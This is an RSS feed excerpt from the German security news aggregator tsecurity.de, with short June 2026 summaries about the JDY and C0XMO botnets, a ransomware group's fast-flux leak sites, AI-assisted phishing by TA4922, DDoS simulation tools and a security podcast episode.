<pubDate>Thu, 11 Jun 2026 09:09:28 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>4 posts were published in the last hour 6:34 : China-Linked JDY Botnet Hijacks 1,500+ IoT Devices for Rapid Exploits 6:34 : GitLab Patches Multiple Vulnerabilities Allowing Account Takeover 6:34 : Hackers Exploit AWS CloudTrail and Google Cloud Logging to…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/it-security-news-hourly-summary-2026-06-11-09h-4-posts/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/it-security-news-hourly-summary-2026-06-11-09h-4-posts/">IT Security News Hourly Summary 2026-06-11 09h : 4 posts</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[China-Linked JDY Botnet Hijacks 1,500+ IoT Devices for Rapid Exploits]]></title>
<description><![CDATA[A significant resurgence of the JDY botnet, a covert reconnaissance network tied to China-nexus threat activity. Once a component of the larger KV-botnet ecosystem, JDY has expanded to more than 1,500 compromised small office/home office (SOHO) and Internet of Things…
Read more →
The post China-L...]]></description>
<link>https://tsecurity.de/de/3589661/it-security-nachrichten/china-linked-jdy-botnet-hijacks-1500-iot-devices-for-rapid-exploits/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3589661/it-security-nachrichten/china-linked-jdy-botnet-hijacks-1500-iot-devices-for-rapid-exploits/</guid>
<pubDate>Thu, 11 Jun 2026 08:37:38 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A significant resurgence of the JDY botnet, a covert reconnaissance network tied to China-nexus threat activity. Once a component of the larger KV-botnet ecosystem, JDY has expanded to more than 1,500 compromised small office/home office (SOHO) and Internet of Things…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/china-linked-jdy-botnet-hijacks-1500-iot-devices-for-rapid-exploits/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/china-linked-jdy-botnet-hijacks-1500-iot-devices-for-rapid-exploits/">China-Linked JDY Botnet Hijacks 1,500+ IoT Devices for Rapid Exploits</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[China-Linked JDY Botnet Hijacks 1,500+ IoT Devices for Rapid Exploits]]></title>
<description><![CDATA[A significant resurgence of the JDY botnet, a covert reconnaissance network tied to China-nexus threat activity. Once a component of the larger KV-botnet ecosystem, JDY has expanded to more than 1,500 compromised small office/home office (SOHO) and Internet of Things (IoT) devices and now functio...]]></description>
<link>https://tsecurity.de/de/3589616/it-security-nachrichten/china-linked-jdy-botnet-hijacks-1500-iot-devices-for-rapid-exploits/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3589616/it-security-nachrichten/china-linked-jdy-botnet-hijacks-1500-iot-devices-for-rapid-exploits/</guid>
<pubDate>Thu, 11 Jun 2026 08:12:16 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A significant resurgence of the JDY botnet, a covert reconnaissance network tied to China-nexus threat activity. Once a component of the larger KV-botnet ecosystem, JDY has expanded to more than 1,500 compromised small office/home office (SOHO) and Internet of Things (IoT) devices and now functions as a high-performance, centrally controlled scanner that accelerates vulnerability discovery […]</p>
<p>The post <a href="https://gbhackers.com/china-linked-jdy-botnet/">China-Linked JDY Botnet Hijacks 1,500+ IoT Devices for Rapid Exploits</a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[JDY Botnet Expands With 1,500 Compromised Devices Targeting Fresh Vulnerabilities]]></title>
<description><![CDATA[A significant resurgence of the JDY botnet, a covert reconnaissance network linked to China-nexus threat groups such as Volt Typhoon. Originally part of the larger KV-botnet ecosystem that was heavily disrupted by U.S. government takedowns in early 2024, the JDY cluster managed to survive. Today,...]]></description>
<link>https://tsecurity.de/de/3589611/it-security-nachrichten/jdy-botnet-expands-with-1500-compromised-devices-targeting-fresh-vulnerabilities/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3589611/it-security-nachrichten/jdy-botnet-expands-with-1500-compromised-devices-targeting-fresh-vulnerabilities/</guid>
<pubDate>Thu, 11 Jun 2026 08:12:09 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A significant resurgence of the JDY botnet, a covert reconnaissance network linked to China-nexus threat groups such as Volt Typhoon. Originally part of the larger KV-botnet ecosystem that was heavily disrupted by U.S. government takedowns in early 2024, the JDY cluster managed to survive. Today, it operates as a highly efficient operational relay box (ORB) […]</p>
<p>The post <a href="https://cyberpress.org/jdy-botnet-targets-flaws/">JDY Botnet Expands With 1,500 Compromised Devices Targeting Fresh Vulnerabilities</a> appeared first on <a href="https://cyberpress.org/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[6/10/2026]]></title>
<description><![CDATA[China-Linked JDY Botnet Expands to 1,500+ Devices for Cyber Reconnaissance …China-Linked JDY Botnet Expands Targeting of U.S. Military NetworksUK Weakens Proposed Telecoms Defenses Against Chinese Hackers After Industry PushbackNorth Koreans Behind Nearly Half of U.S. Tech Industry Hacks, Says Cr...]]></description>
<link>https://tsecurity.de/de/3589175/it-security-nachrichten/6102026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3589175/it-security-nachrichten/6102026/</guid>
<pubDate>Thu, 11 Jun 2026 01:38:28 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[China-Linked JDY Botnet Expands to 1,500+ Devices for Cyber Reconnaissance …China-Linked JDY Botnet Expands Targeting of U.S. Military NetworksUK Weakens Proposed Telecoms Defenses Against Chinese Hackers After Industry PushbackNorth Koreans Behind Nearly Half of U.S. Tech Industry Hacks, Says CrowdStrikeCISA Tells U.S. Agencies to Fix Security Bugs in as Little as 3 Days Thanks to … <a href="https://thecyberbeat.com/2026/06/10/6-10-2026/" class="more-link">Continue reading <span class="screen-reader-text">6/10/2026</span></a>]]></content:encoded>
</item>
<item>
<title><![CDATA[China-Linked JDY Botnet Expands to 1,500+ Devices for Cyber Reconnaissance]]></title>
<description><![CDATA[Cybersecurity researchers have warned of a “resurgence and expansion” of JDY, a covert network associated with China-nexus state-sponsored threat actors. “The JDY botnet comprises over 1,500 SOHO [small office and home office] and IoT devices and operates as a centrally…
Read more →
The post Chin...]]></description>
<link>https://tsecurity.de/de/3588456/it-security-nachrichten/china-linked-jdy-botnet-expands-to-1500-devices-for-cyber-reconnaissance/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3588456/it-security-nachrichten/china-linked-jdy-botnet-expands-to-1500-devices-for-cyber-reconnaissance/</guid>
<pubDate>Wed, 10 Jun 2026 19:10:38 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Cybersecurity researchers have warned of a “resurgence and expansion” of JDY, a covert network associated with China-nexus state-sponsored threat actors. “The JDY botnet comprises over 1,500 SOHO [small office and home office] and IoT devices and operates as a centrally…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/china-linked-jdy-botnet-expands-to-1500-devices-for-cyber-reconnaissance/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/china-linked-jdy-botnet-expands-to-1500-devices-for-cyber-reconnaissance/">China-Linked JDY Botnet Expands to 1,500+ Devices for Cyber Reconnaissance</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[China-Linked JDY Botnet Expands to 1,500+ Devices for Cyber Reconnaissance]]></title>
<description><![CDATA[Cybersecurity researchers have warned of a "resurgence and expansion" of JDY, a covert network associated with China-nexus state-sponsored threat actors.

"The JDY botnet comprises over 1,500 SOHO [small office and home office] and IoT devices and operates as a centrally controlled, high-performa...]]></description>
<link>https://tsecurity.de/de/3588379/it-security-nachrichten/china-linked-jdy-botnet-expands-to-1500-devices-for-cyber-reconnaissance/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3588379/it-security-nachrichten/china-linked-jdy-botnet-expands-to-1500-devices-for-cyber-reconnaissance/</guid>
<pubDate>Wed, 10 Jun 2026 18:39:36 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Cybersecurity researchers have warned of a "resurgence and expansion" of JDY, a covert network associated with China-nexus state-sponsored threat actors.

"The JDY botnet comprises over 1,500 SOHO [small office and home office] and IoT devices and operates as a centrally controlled, high-performance scanner used to discover, fingerprint, and continuously map exposed services at scale," Lumen's]]></content:encoded>
</item>
<item>
<title><![CDATA[China-linked JDY botnet expands targeting of U.S. military networks]]></title>
<description><![CDATA[The JDY botnet, a malware network previously associated with Chinese threat actors like Volt Typhoon, has significantly expanded its targeting scope and reconnaissance efforts. [...]]]></description>
<link>https://tsecurity.de/de/3588160/it-security-nachrichten/china-linked-jdy-botnet-expands-targeting-of-us-military-networks/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3588160/it-security-nachrichten/china-linked-jdy-botnet-expands-targeting-of-us-military-networks/</guid>
<pubDate>Wed, 10 Jun 2026 17:29:36 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The JDY botnet, a malware network previously associated with Chinese threat actors like Volt Typhoon, has significantly expanded its targeting scope and reconnaissance efforts. [...]]]></content:encoded>
</item>
<item>
<title><![CDATA[Silent Ransom Group Uses Fast Flux Botnet to Hide Law Firm Leak Sites]]></title>
<description><![CDATA[Cybersecurity firm Resecurity reports Silent Ransom Group is using a fast flux botnet to hide data leak sites while targeting law firms with theft and vishing. This article has been indexed from Hackread – Cybersecurity News, Data Breaches, AI and…
Read more →
The post Silent Ransom Group Uses Fa...]]></description>
<link>https://tsecurity.de/de/3581686/it-security-nachrichten/silent-ransom-group-uses-fast-flux-botnet-to-hide-law-firm-leak-sites/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3581686/it-security-nachrichten/silent-ransom-group-uses-fast-flux-botnet-to-hide-law-firm-leak-sites/</guid>
<pubDate>Mon, 08 Jun 2026 16:09:14 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Cybersecurity firm Resecurity reports Silent Ransom Group is using a fast flux botnet to hide data leak sites while targeting law firms with theft and vishing. This article has been indexed from Hackread – Cybersecurity News, Data Breaches, AI and…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/silent-ransom-group-uses-fast-flux-botnet-to-hide-law-firm-leak-sites/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/silent-ransom-group-uses-fast-flux-botnet-to-hide-law-firm-leak-sites/">Silent Ransom Group Uses Fast Flux Botnet to Hide Law Firm Leak Sites</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Silent Ransom Group Uses Fast Flux Botnet to Hide Law Firm Leak Sites]]></title>
<description><![CDATA[Cybersecurity firm Resecurity reports Silent Ransom Group is using a fast flux botnet to hide data leak sites while targeting law firms with theft and vishing.]]></description>
<link>https://tsecurity.de/de/3581650/it-security-nachrichten/silent-ransom-group-uses-fast-flux-botnet-to-hide-law-firm-leak-sites/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3581650/it-security-nachrichten/silent-ransom-group-uses-fast-flux-botnet-to-hide-law-firm-leak-sites/</guid>
<pubDate>Mon, 08 Jun 2026 15:52:45 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Cybersecurity firm Resecurity reports Silent Ransom Group is using a fast flux botnet to hide data leak sites while targeting law firms with theft and vishing.]]></content:encoded>
</item>
<item>
<title><![CDATA[IoT Botnet C0XMO Adds Competitor-Killing Capability]]></title>
<description><![CDATA[C0XMO is a new Gafgyt botnet variant exploiting old router flaws, spreading across IoT devices, killing rivals, and enabling large-scale DDoS attacks. In March 2026, FortiGuard Labs discovered a new variant of the Gafgyt botnet, dubbed C0XMO, which is noticeably…
Read more →
The post IoT Botnet C...]]></description>
<link>https://tsecurity.de/de/3580712/it-security-nachrichten/iot-botnet-c0xmo-adds-competitor-killing-capability/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3580712/it-security-nachrichten/iot-botnet-c0xmo-adds-competitor-killing-capability/</guid>
<pubDate>Mon, 08 Jun 2026 09:43:41 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>C0XMO is a new Gafgyt botnet variant exploiting old router flaws, spreading across IoT devices, killing rivals, and enabling large-scale DDoS attacks. In March 2026, FortiGuard Labs discovered a new variant of the Gafgyt botnet, dubbed C0XMO, which is noticeably…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/iot-botnet-c0xmo-adds-competitor-killing-capability/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/iot-botnet-c0xmo-adds-competitor-killing-capability/">IoT Botnet C0XMO Adds Competitor-Killing Capability</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[IoT Botnet C0XMO Adds Competitor-Killing Capability]]></title>
<description><![CDATA[C0XMO is a new Gafgyt botnet variant exploiting old router flaws, spreading across IoT devices, killing rivals, and enabling large-scale DDoS attacks. In March 2026, FortiGuard Labs discovered a new variant of the Gafgyt botnet, dubbed C0XMO, which is noticeably more capable than its predecessors...]]></description>
<link>https://tsecurity.de/de/3580691/it-security-nachrichten/iot-botnet-c0xmo-adds-competitor-killing-capability/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3580691/it-security-nachrichten/iot-botnet-c0xmo-adds-competitor-killing-capability/</guid>
<pubDate>Mon, 08 Jun 2026 09:31:53 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[C0XMO is a new Gafgyt botnet variant exploiting old router flaws, spreading across IoT devices, killing rivals, and enabling large-scale DDoS attacks. In March 2026, FortiGuard Labs discovered a new variant of the Gafgyt botnet, dubbed C0XMO, which is noticeably more capable than its predecessors. The malware spreads through CVE-2021-27137, a stack buffer overflow in […]]]></content:encoded>
</item>
<item>
<title><![CDATA[C0XMO botnet spreads via DD-WRT router flaw, kills rival malware]]></title>
<description><![CDATA[A new variant of the Gafgyt botnet called C0XMO is targeting DD-WRT router firmware and can move to other device types with various CPU architectures. [...]]]></description>
<link>https://tsecurity.de/de/3579499/it-security-nachrichten/c0xmo-botnet-spreads-via-dd-wrt-router-flaw-kills-rival-malware/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3579499/it-security-nachrichten/c0xmo-botnet-spreads-via-dd-wrt-router-flaw-kills-rival-malware/</guid>
<pubDate>Sun, 07 Jun 2026 16:35:22 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A new variant of the Gafgyt botnet called C0XMO is targeting DD-WRT router firmware and can move to other device types with various CPU architectures. [...]]]></content:encoded>
</item>
<item>
<title><![CDATA[Chinesische Hacker-Gruppe TA4922 steigert Angriffstempo auf Deutschland]]></title>
<description><![CDATA[Die chinesischsprachige Hacker-Gruppe TA4922 weitet ihre Angriffe massiv auf Europa aus und nutzt dafür KI-generierte Phishing-Kampagnen.

Tags: #Cyber Crime | #Künstliche Intelligenz]]></description>
<link>https://tsecurity.de/de/3577584/it-security-nachrichten/chinesische-hacker-gruppe-ta4922-steigert-angriffstempo-auf-deutschland/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3577584/it-security-nachrichten/chinesische-hacker-gruppe-ta4922-steigert-angriffstempo-auf-deutschland/</guid>
<pubDate>Sat, 06 Jun 2026 13:19:58 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1920" height="1080" src="https://www.it-daily.net/wp-content/uploads/2024/12/China-Hacker_Shutterstock_2402111235_1920.jpg" class="attachment-full size-full wp-post-image" alt="Botnet, Quad7, China" decoding="async" srcset="https://www.it-daily.net/wp-content/uploads/2024/12/China-Hacker_Shutterstock_2402111235_1920.jpg 1920w, https://www.it-daily.net/wp-content/uploads/2024/12/China-Hacker_Shutterstock_2402111235_1920-300x169.jpg 300w, https://www.it-daily.net/wp-content/uploads/2024/12/China-Hacker_Shutterstock_2402111235_1920-1024x576.jpg 1024w, https://www.it-daily.net/wp-content/uploads/2024/12/China-Hacker_Shutterstock_2402111235_1920-768x432.jpg 768w, https://www.it-daily.net/wp-content/uploads/2024/12/China-Hacker_Shutterstock_2402111235_1920-1536x864.jpg 1536w" sizes="(max-width: 1920px) 100vw, 1920px" title="Chinesische Hacker-Gruppe TA4922 steigert Angriffstempo auf Deutschland 1"></p>
    Die chinesischsprachige Hacker-Gruppe TA4922 weitet ihre Angriffe massiv auf Europa aus und nutzt dafür KI-generierte Phishing-Kampagnen.

<p>Tags: <a href="https://www.it-daily.net/thema/cyber-crime">#Cyber Crime</a> | <a href="https://www.it-daily.net/thema/kuenstliche-intelligenz">#Künstliche Intelligenz</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Top 5 Best Tools for Simulated DDoS Attacks in 2026]]></title>
<description><![CDATA[Last year, a botnet hurled 31.4 Tbps of junk traffic at a single target—enough data to stream every Netflix movie at once. The record-shattering flood forced boards, regulators, and cloud teams to ask one question: are we sure our defenses…
Read more →
The post Top 5 Best Tools for Simulated DDoS...]]></description>
<link>https://tsecurity.de/de/3577333/it-security-nachrichten/top-5-best-tools-for-simulated-ddos-attacks-in-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3577333/it-security-nachrichten/top-5-best-tools-for-simulated-ddos-attacks-in-2026/</guid>
<pubDate>Sat, 06 Jun 2026 10:34:44 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Last year, a botnet hurled 31.4 Tbps of junk traffic at a single target—enough data to stream every Netflix movie at once. The record-shattering flood forced boards, regulators, and cloud teams to ask one question: are we sure our defenses…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/top-5-best-tools-for-simulated-ddos-attacks-in-2026/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/top-5-best-tools-for-simulated-ddos-attacks-in-2026/">Top 5 Best Tools for Simulated DDoS Attacks in 2026</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Top 5 Best Tools for Simulated DDoS Attacks in 2026]]></title>
<description><![CDATA[Last year, a botnet hurled 31.4 Tbps of junk traffic at a single target—enough data to stream every Netflix movie at once. The record-shattering flood forced boards, regulators, and cloud teams to ask one question: are we sure our defenses work when the internet turns hostile? That’s where safe, ...]]></description>
<link>https://tsecurity.de/de/3577169/it-security-nachrichten/top-5-best-tools-for-simulated-ddos-attacks-in-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3577169/it-security-nachrichten/top-5-best-tools-for-simulated-ddos-attacks-in-2026/</guid>
<pubDate>Sat, 06 Jun 2026 08:52:33 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Last year, a botnet hurled 31.4 Tbps of junk traffic at a single target—enough data to stream every Netflix movie at once. The record-shattering flood forced boards, regulators, and cloud teams to ask one question: are we sure our defenses work when the internet turns hostile? That’s where safe, controlled DDoS simulations come in. By […]</p>
<p>The post <a href="https://cybersecuritynews.com/simulated-ddos-attacks/">Top 5 Best Tools for Simulated DDoS Attacks in 2026</a> appeared first on <a href="https://cybersecuritynews.com/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[New Gafgyt Variant Targets Multiple Linux Architectures With Modular Propagation]]></title>
<description><![CDATA[A newly discovered variant of the Gafgyt botnet malware, named C0XMO, has been quietly spreading across Linux-based devices by targeting a known vulnerability in DD-WRT router firmware. The malware exploits a stack buffer overflow flaw in the UPnP service of…
Read more →
The post New Gafgyt Varia...]]></description>
<link>https://tsecurity.de/de/3576619/it-security-nachrichten/new-gafgyt-variant-targets-multiple-linux-architectures-with-modular-propagation/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3576619/it-security-nachrichten/new-gafgyt-variant-targets-multiple-linux-architectures-with-modular-propagation/</guid>
<pubDate>Fri, 05 Jun 2026 23:38:04 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A newly discovered variant of the Gafgyt botnet malware, named C0XMO, has been quietly spreading across Linux-based devices by targeting a known vulnerability in DD-WRT router firmware. The malware exploits a stack buffer overflow flaw in the UPnP service of…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/new-gafgyt-variant-targets-multiple-linux-architectures-with-modular-propagation/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/new-gafgyt-variant-targets-multiple-linux-architectures-with-modular-propagation/">New Gafgyt Variant Targets Multiple Linux Architectures With Modular Propagation</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[New Gafgyt Variant Targets Multiple Linux Architectures With Modular Propagation]]></title>
<description><![CDATA[A newly discovered variant of the Gafgyt botnet malware, named C0XMO, has been quietly spreading across Linux-based devices by targeting a known vulnerability in DD-WRT router firmware. The malware exploits a stack buffer overflow flaw in the UPnP service of affected routers, letting attackers ga...]]></description>
<link>https://tsecurity.de/de/3576447/it-security-nachrichten/new-gafgyt-variant-targets-multiple-linux-architectures-with-modular-propagation/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3576447/it-security-nachrichten/new-gafgyt-variant-targets-multiple-linux-architectures-with-modular-propagation/</guid>
<pubDate>Fri, 05 Jun 2026 21:52:52 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A newly discovered variant of the Gafgyt botnet malware, named C0XMO, has been quietly spreading across Linux-based devices by targeting a known vulnerability in DD-WRT router firmware. The malware exploits a stack buffer overflow flaw in the UPnP service of affected routers, letting attackers gain full access without any credentials. Once inside, it works to […]</p>
<p>The post <a href="https://cybersecuritynews.com/new-gafgyt-variant-targets-multiple-linux-architectures/">New Gafgyt Variant Targets Multiple Linux Architectures With Modular Propagation</a> appeared first on <a href="https://cybersecuritynews.com/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Weiteres Botnet zerschlagen mit 17 Millionen Geräten und Servern - B2B Cyber Security]]></title>
<description><![CDATA[Jetzt Newsletter abonnieren. Einmal im Monat die besten News von B2B CYBER SECURITY lesen. E-Mail.]]></description>
<link>https://tsecurity.de/de/3576055/it-security-nachrichten/weiteres-botnet-zerschlagen-mit-17-millionen-geraeten-und-servern-b2b-cyber-security/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3576055/it-security-nachrichten/weiteres-botnet-zerschlagen-mit-17-millionen-geraeten-und-servern-b2b-cyber-security/</guid>
<pubDate>Fri, 05 Jun 2026 18:35:24 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Jetzt Newsletter abonnieren. Einmal im Monat die besten News von B2B <b>CYBER SECURITY</b> lesen. E-Mail.]]></content:encoded>
</item>
<item>
<title><![CDATA[New Gafgyt Variant Targets Linux Systems With Modular Spread Tactics]]></title>
<description><![CDATA[A new Gafgyt-family botnet, tracked as C0XMO, marks a notable technical shift in IoT malware design: the separation of scanning and propagation into distinct components and multi-architecture payloads that maximize reach across heterogeneous Linux devices. The operator delivered C0XMO by…
Read mo...]]></description>
<link>https://tsecurity.de/de/3575059/it-security-nachrichten/new-gafgyt-variant-targets-linux-systems-with-modular-spread-tactics/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3575059/it-security-nachrichten/new-gafgyt-variant-targets-linux-systems-with-modular-spread-tactics/</guid>
<pubDate>Fri, 05 Jun 2026 12:34:46 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A new Gafgyt-family botnet, tracked as C0XMO, marks a notable technical shift in IoT malware design: the separation of scanning and propagation into distinct components and multi-architecture payloads that maximize reach across heterogeneous Linux devices. The operator delivered C0XMO by…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/new-gafgyt-variant-targets-linux-systems-with-modular-spread-tactics/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/new-gafgyt-variant-targets-linux-systems-with-modular-spread-tactics/">New Gafgyt Variant Targets Linux Systems With Modular Spread Tactics</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Gafgyt Malware Variant Expands Attacks Across Linux Architectures]]></title>
<description><![CDATA[A new variant of the Gafgyt botnet, tracked as C0XMO, is rapidly expanding its reach across multiple Linux architectures. Discovered earlier this year, this malware initially breaches systems by exploiting CVE-2021-27137, a stack buffer overflow vulnerability found in the UPnP service of specific...]]></description>
<link>https://tsecurity.de/de/3575037/it-security-nachrichten/gafgyt-malware-variant-expands-attacks-across-linux-architectures/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3575037/it-security-nachrichten/gafgyt-malware-variant-expands-attacks-across-linux-architectures/</guid>
<pubDate>Fri, 05 Jun 2026 12:22:30 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A new variant of the Gafgyt botnet, tracked as C0XMO, is rapidly expanding its reach across multiple Linux architectures. Discovered earlier this year, this malware initially breaches systems by exploiting CVE-2021-27137, a stack buffer overflow vulnerability found in the UPnP service of specific DD-WRT routers. By sending specially crafted M-SEARCH requests over UDP port 1900, […]</p>
<p>The post <a href="https://cyberpress.org/gafgyt-targets-linux-architectures/">Gafgyt Malware Variant Expands Attacks Across Linux Architectures</a> appeared first on <a href="https://cyberpress.org/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[New Gafgyt Variant Targets Linux Systems With Modular Spread Tactics]]></title>
<description><![CDATA[A new Gafgyt-family botnet, tracked as C0XMO, marks a notable technical shift in IoT malware design: the separation of scanning and propagation into distinct components and multi-architecture payloads that maximize reach across heterogeneous Linux devices. The operator delivered C0XMO by exploiti...]]></description>
<link>https://tsecurity.de/de/3574984/it-security-nachrichten/new-gafgyt-variant-targets-linux-systems-with-modular-spread-tactics/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3574984/it-security-nachrichten/new-gafgyt-variant-targets-linux-systems-with-modular-spread-tactics/</guid>
<pubDate>Fri, 05 Jun 2026 12:08:10 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A new Gafgyt-family botnet, tracked as C0XMO, marks a notable technical shift in IoT malware design: the separation of scanning and propagation into distinct components and multi-architecture payloads that maximize reach across heterogeneous Linux devices. The operator delivered C0XMO by exploiting CVE-2021-27137 a stack buffer overflow in the UPnP SSDP parser of vulnerable DD-WRT firmware […]</p>
<p>The post <a href="https://gbhackers.com/gafgyt-variant-targets-linux/">New Gafgyt Variant Targets Linux Systems With Modular Spread Tactics</a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security Researchers Are Threat Actors - PSW #929]]></title>
<description><![CDATA[Author: Security Weekly - A CRA Resource - Bewertung: 1x - Views:4 This week in the security news:

- Security Researchers Are Threat Actors according to Microsoft
- Hands-free malicious firmware
- If you've ever typed "ls" in Windows, this is for you
- Cisco makes more patches, wants you to...]]></description>
<link>https://tsecurity.de/de/3573936/it-security-video/security-researchers-are-threat-actors-psw-929/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3573936/it-security-video/security-researchers-are-threat-actors-psw-929/</guid>
<pubDate>Thu, 04 Jun 2026 23:18:00 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Security Weekly - A CRA Resource - Bewertung: 1x - Views:4 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/C1yPGxUKMTE?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>This week in the security news:<br />
<br />
- Security Researchers Are Threat Actors according to Microsoft<br />
- Hands-free malicious firmware<br />
- If you've ever typed "ls" in Windows, this is for you<br />
- Cisco makes more patches, wants you to pay<br />
- Ambiguous Secure Boot bypass <br />
- Threat actors love network edge devices, and I have the chat logs and leaks to prove it<br />
- The downside of chip sanctions<br />
- Your VoIP phone is hacked<br />
- Vulnerability disclosure and incentives<br />
